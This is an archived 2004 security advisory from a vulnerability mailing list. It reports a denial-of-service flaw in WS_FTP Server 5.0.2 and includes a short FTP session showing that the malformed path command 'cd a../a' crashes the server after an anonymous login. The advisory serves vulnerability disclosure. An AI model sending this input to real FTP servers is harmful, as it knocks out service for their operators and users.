[vulnwatch] WS_FTP Server Denial of Service Vulnerability
From: lion (lion_at_cnhonker.net)
Date: 08/29/04
- Previous message: john.courcoul_at_mac.com: "Re: Netscape Navigator 7.2 failure to isolate browser tabs (was Re: Computer Network Defence Vulnerability Alert State)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 30 Aug 2004 02:40:46 +0800 To: "bugtraq" <bugtraq@securityfocus.com>
[vulnwatch] WS_FTP Server Denial of Service Vulnerability
www.cnhonker.com
Security Advisory
Advisory Name: WS_FTP Server Denial of Service Vulnerability
Release Date: 08/30/2004
Affected version: WS_FTP Server 5.0.2
Author: lion <lion@cnhonker.net>
Overview:
A vulnerability has been found in WS_FTP Server. The problem \
is in the module of file path parse will cause FTP server to \
consume large amounts of CPU power.
Exploit:
E:\>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a
Connection closed by remote host.
About HUC:
HUC is still alive.
- Previous message: john.courcoul_at_mac.com: "Re: Netscape Navigator 7.2 failure to isolate browser tabs (was Re: Computer Network Defence Vulnerability Alert State)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
